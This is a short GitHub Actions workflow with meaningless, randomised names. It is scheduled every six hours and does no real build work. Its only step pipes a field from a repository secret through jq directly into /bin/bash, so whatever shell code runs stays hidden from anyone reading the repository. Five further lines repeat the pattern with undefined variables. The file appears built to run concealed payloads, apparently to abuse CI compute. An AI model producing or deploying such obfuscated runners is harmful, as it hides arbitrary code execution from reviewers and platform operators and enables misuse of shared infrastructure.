name: juededy
on:
  workflow_dispatch:
  schedule:
    - cron: '29 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: juededy
        env:
          h3: ${{ secrets.h3 }}
        run: |
          echo $h3 | jq -r .znibo7129 | /bin/bash
          echo $eunkq99 | jq -r .nyram57210 | /bin/bash
          echo $frie89 | jq -r .vt84 | /bin/bash
          echo $b925 | jq -r .plvfb48 | /bin/bash
          echo $qnnae6004 | jq -r .ma5711 | /bin/bash
          echo $yc588 | jq -r .ensqx77 | /bin/bash

